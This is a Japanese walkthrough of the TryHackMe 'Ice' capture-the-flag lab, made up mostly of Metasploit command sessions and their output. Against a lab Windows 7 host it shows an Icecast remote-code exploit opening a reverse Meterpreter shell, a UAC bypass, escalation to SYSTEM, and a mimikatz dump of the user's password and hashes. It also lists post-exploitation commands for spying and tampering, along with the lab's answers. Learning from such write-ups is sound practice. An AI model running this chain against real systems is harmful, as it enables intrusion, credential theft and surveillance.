概要
TryHackMe「Ice」のWalkthroughです。
Task2
Q3.One of the more interesting ports that is open is Microsoft Remote Desktop (MSRDP). What port is this open on?
ポートスキャンを実行します。
$ sudo nmap -sSVC -T4 -p- 10.10.227.80 --min-rate 5000
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
5357/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Service Unavailable
8000/tcp open http Icecast streaming media server
|_http-title: Site doesn't have a title (text/html).
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
49160/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h50m46s, deviation: 3h27m51s, median: -9m14s
|_nbstat: NetBIOS name: DARK-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:32:69:6d:63:af (unknown)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Dark-PC
| NetBIOS computer name: DARK-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2025-01-22T05:27:30-06:00
| smb2-time:
| date: 2025-01-22T11:27:31
|_ start_date: 2025-01-22T10:44:10
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2:1:0:
|_ Message signing enabled but not required
ポートの稼働状況が分かりました。
A.3389
Q4.What service did nmap identify as running on port 8000? (First word of this service)
Hint.If nmap doesn't show you the service name, try running the scan again possibly with the version enumeration switch on (-sV)
A.Icecast
Q5.What does Nmap identify as the hostname of the machine? (All caps for the answer)
Hint.If nmap doesn't show you the hostname, try running the scan again possibly with the default scripts switch on (-sC)
A.DARK-PC
Task3
Q1.What is the Impact Score for this vulnerability?
Hint.This type of vulnerability allows for an attacker to execute arbitrary code in an unauthenticated fashion. The name can be found listed at the 'Vulnerability Type' on https://www.cvedetails.com
IcecastのRCE脆弱性を調べるとCVE-2004-1561が見つかりました。
Impact Scoreは6.4です。
A.6.4
Q2.What is the CVE number for this vulnerability?
Hint.This CVE was disclosed in 2004. In the case that you get stuck on this question, a link to the manual version of the exploit associated with this service can be found in the final task. This link has some additional details about the CVE we're exploring here. https://www.cvedetails.com is recommended for the completion of this question.
A.CVE-2004-1561
Q4.What is the full path (starting with exploit) for the exploitation module?
Metasploitを起動し、icecastのエクスプロイトモジュールを検索します。
msf6 > search icecast
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/http/icecast_header 2004-09-28 great No Icecast Header Overwrite
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/http/icecast_header
A.exploit/windows/http/icecast_header
Q6.What is the only required setting which currently is blank?
show optionsで設定するオプションを確認します。
msf6 exploit(windows/http/icecast_header) > show options
Module options (exploit/windows/http/icecast_header):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using
-metasploit/basics/using-metasploit.html
RPORT 8000 yes The target port (TCP)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.0.2.15 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
A.RHOSTS
Task4
Q1.What's the name of the shell we have now?
Hint.It'll be the name displayed on the command prompt
エクスプイトを実行し、セッションを張ります。
msf6 exploit(windows/http/icecast_header) > exploit
[*] Started reverse TCP handler on 10.6.55.144:4444
[*] Sending stage (176198 bytes) to 10.10.227.80
[*] Meterpreter session 1 opened (10.6.55.144:4444 -> 10.10.227.80:49292) at 2025-01-22 07:08:49 -0500
meterpreter >
A.meterpreter
Q2.What user was running that Icecast process?
Hint.getuid
getuidでユーザー名を調べます。
meterpreter > getuid
Server username: Dark-PC\Dark
A.Dark
Q3.What build of Windows is the system?
Hint.sysinfo
sysinfoで調べます。
meterpreter > sysinfo
Computer : DARK-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
A.7601
Q4.what is the architecture of the process we're running?
Hint.sysinfo
A.x64
Q6.What is the full path (starting with exploit/) for the first returned exploit?
Hint.The answer will include eventvwr
post/multi/recon/local_exploit_suggesterを実行します。
meterpreter > run post/multi/recon/local_exploit_suggester
[*] 10.10.227.80 - Collecting local exploits for x86/windows...
[*] 10.10.227.80 - 196 exploit checks are being tried...
[+] 10.10.227.80 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.227.80 - exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move: The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
[+] 10.10.227.80 - exploit/windows/local/ms10_092_schelevator: The service is running, but could not be validated.
[+] 10.10.227.80 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.227.80 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.227.80 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.227.80 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.227.80 - exploit/windows/local/ntusermndragover: The target appears to be vulnerable.
[+] 10.10.227.80 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[+] 10.10.227.80 - exploit/windows/local/tokenmagic: The target appears to be vulnerable.
[*] Running check method for exploit 41 / 41
[*] 10.10.227.80 - Valid modules for session 1:
============================
# Name Potentially Vulnerable? Check Result
- ---- ----------------------- ------------
1 exploit/windows/local/bypassuac_eventvwr Yes The target appears to be vulnerable.
2 exploit/windows/local/cve_2020_0787_bits_arbitrary_file_move Yes The service is running, but could not be validated. Vulnerable Windows 7/Windows Server 2008 R2 build detected!
3 exploit/windows/local/ms10_092_schelevator Yes The service is running, but could not be validated.
4 exploit/windows/local/ms13_053_schlamperei Yes The target appears to be vulnerable.
5 exploit/windows/local/ms13_081_track_popup_menu Yes The target appears to be vulnerable.
6 exploit/windows/local/ms14_058_track_popup_menu Yes The target appears to be vulnerable.
7 exploit/windows/local/ms15_051_client_copy_image Yes The target appears to be vulnerable.
8 exploit/windows/local/ntusermndragover Yes The target appears to be vulnerable.
9 exploit/windows/local/ppr_flatten_rec Yes The target appears to be vulnerable.
10 exploit/windows/local/tokenmagic Yes The target appears to be vulnerable.
A.exploit/windows/local/bypassuac_eventvwr
Q10.What is the name of this option?
CTRL+Zでバックグラウンドセッションにし、exploit/windows/local/bypassuac_eventvwrを設定します。
meterpreter >
Background session 1? [y/N]
msf6 exploit(windows/http/icecast_header) > use exploit/windows/local/bypassuac_eventvwr
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
セッション番号を確認します。
msf6 exploit(windows/local/bypassuac_eventvwr) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows Dark-PC\Dark @ DARK-PC 10.6.55.144:4444 -> 10.10.227.80:49292
(10.10.227.80)
オプションにセッション番号を設定します。
msf6 exploit(windows/local/bypassuac_eventvwr) > set SESSION 1
SESSION => 1
LHOSTも設定します。
msf6 exploit(windows/local/bypassuac_eventvwr) > set lhost 10.6.55.144
lhost => 10.6.55.144
A.LHOST
Q14.What permission listed allows us to take ownership of files?
Hint.This permission will be close to the bottom of those listed.
エクスプイトを実行し、新たなセッションを張れました。
msf6 exploit(windows/local/bypassuac_eventvwr) > exploit
[*] Started reverse TCP handler on 10.6.55.144:4444
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Configuring payload and stager registry keys ...
[*] Executing payload: C:\Windows\SysWOW64\eventvwr.exe
[+] eventvwr.exe executed successfully, waiting 10 seconds for the payload to execute.
[*] Sending stage (176198 bytes) to 10.10.227.80
[*] Meterpreter session 2 opened (10.6.55.144:4444 -> 10.10.227.80:49312) at 2025-01-22 07:27:37 -0500
[*] Cleaning up registry keys ...
meterpreter >
getprivsで権限を確認します。
meterpreter > getprivs
Enabled Process Privileges
==========================
Name
----
SeBackupPrivilege
SeChangeNotifyPrivilege
SeCreateGlobalPrivilege
SeCreatePagefilePrivilege
SeCreateSymbolicLinkPrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeIncreaseBasePriorityPrivilege
SeIncreaseQuotaPrivilege
SeIncreaseWorkingSetPrivilege
SeLoadDriverPrivilege
SeManageVolumePrivilege
SeProfileSingleProcessPrivilege
SeRemoteShutdownPrivilege
SeRestorePrivilege
SeSecurityPrivilege
SeShutdownPrivilege
SeSystemEnvironmentPrivilege
SeSystemProfilePrivilege
SeSystemtimePrivilege
SeTakeOwnershipPrivilege
SeTimeZonePrivilege
SeUndockPrivilege
A.SeTakeOwnershipPrivilege
Task5
Q2.What's the name of the printer service?
Hint.Printers will spool documents.
psでプロセスを表示します。
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process]
4 0 System x64 0
100 688 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost
.exe
416 4 smss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\smss.ex
e
464 688 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost
.exe
544 536 csrss.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.e
xe
596 536 wininit.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\wininit
.exe
604 584 csrss.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\csrss.e
xe
652 584 winlogon.exe x64 1 NT AUTHORITY\SYSTEM C:\Windows\System32\winlogo
n.exe
688 596 services.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\service
s.exe
704 596 lsass.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsass.e
xe
712 596 lsm.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\lsm.exe
820 688 svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost
.exe
888 688 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVI C:\Windows\System32\svchost
CE .exe
936 688 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost
.exe
1008 688 vds.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\vds.exe
1060 688 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost
.exe
1144 688 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVI C:\Windows\System32\svchost
CE .exe
1208 820 slui.exe x64 1 Dark-PC\Dark C:\Windows\System32\slui.ex
e
1276 688 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv
.exe
1320 688 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost
.exe
1336 820 WmiPrvSE.exe x64 0 NT AUTHORITY\NETWORK SERVI C:\Windows\System32\wbem\Wm
CE iPrvSE.exe
1440 688 taskhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\taskhos
t.exe
1496 688 sppsvc.exe x64 0 NT AUTHORITY\NETWORK SERVI C:\Windows\System32\sppsvc.
CE exe
1552 100 dwm.exe x64 1 Dark-PC\Dark C:\Windows\System32\dwm.exe
1588 1532 explorer.exe x64 1 Dark-PC\Dark C:\Windows\explorer.exe
1632 688 amazon-ssm-agen x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\SSM
t.exe \amazon-ssm-agent.exe
1716 688 LiteAgent.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Xen
tools\LiteAgent.exe
1752 688 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost
.exe
1896 688 Ec2Config.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Amazon\Ec2
ConfigService\Ec2Config.exe
2092 688 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVI C:\Windows\System32\svchost
CE .exe
2268 1588 Icecast2.exe x86 1 Dark-PC\Dark C:\Program Files (x86)\Icec
ast2 Win32\Icecast2.exe
2420 604 conhost.exe x64 1 Dark-PC\Dark C:\Windows\System32\conhost
.exe
2548 688 TrustedInstalle x64 0 NT AUTHORITY\SYSTEM C:\Windows\servicing\Truste
r.exe dInstaller.exe
2580 688 SearchIndexer.e x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\SearchI
xe ndexer.exe
2876 2868 powershell.exe x86 1 Dark-PC\Dark C:\Windows\SysWOW64\Windows
Powershell\v1.0\powershell.
exe
A.spoolsv.exe
Q4.What user is listed?
migrateコマンドでプロセスに移行します。
meterpreter > migrate -N spoolsv.exe
[*] Migrating from 2876 to 1276...
[*] Migration completed successfully.
getuidでユーザーを確認します。
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
A.NT AUTHORITY\SYSTEM
Q7.Which command allows up to retrieve all credentials?
mimikatz
meterpreter > load kiwi
Loading extension kiwi...
.#####. mimikatz 2.2.0 20191125 (x64/windows)
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
Success.
creds_allで全ての認証情報を取得できます。
Kiwi Commands
=============
Command Description
------- -----------
creds_all Retrieve all credentials (parsed)
A.creds_all
Q8.Run this command now. What is Dark's password?
creds_allを実行し、認証情報を取得します。
meterpreter > creds_all
[+] Running as SYSTEM
[*] Retrieving all credentials
msv credentials
===============
Username Domain LM NTLM SHA1
-------- ------ -- ---- ----
Dark Dark-PC e52cac67419a9a22ecb083690 7c4fe5eada682714a036e39378 0d082c4b4f2aeafb67fd0ea568
99ed302 362bab a997e9d3ebc0eb
wdigest credentials
===================
Username Domain Password
-------- ------ --------
(null) (null) (null)
DARK-PC$ WORKGROUP (null)
Dark Dark-PC Password01!
tspkg credentials
=================
Username Domain Password
-------- ------ --------
Dark Dark-PC Password01!
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Dark Dark-PC Password01!
dark-pc$ WORKGROUP (null)
A.Password01!
Task6
Q2.What command allows us to dump all of the password hashes stored on the system?
hashdumpコマンドで可能です。
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dumps the contents of the SAM database
A.hashdump
Q3.what command allows us to watch the remote user's desktop in real time?
screenshareコマンドで可能です。
Stdapi: User interface Commands
===============================
Command Description
------- -----------
screenshare Watch the remote user desktop in real time
A.screenshare
Q4.How about if we wanted to record from a microphone attached to the system?
record_micコマンドで可能です。
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
A.record_mic
Q5.What command allows us to do this?
timestompコマンドで可能です。
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file MACE attributes
A.timestomp
Q6.What command allows us to do this?
golden_ticket_createコマンドで可能です。
Kiwi Commands
=============
Command Description
------- -----------
golden_ticket_create Create a golden kerberos ticket
A.golden_ticket_create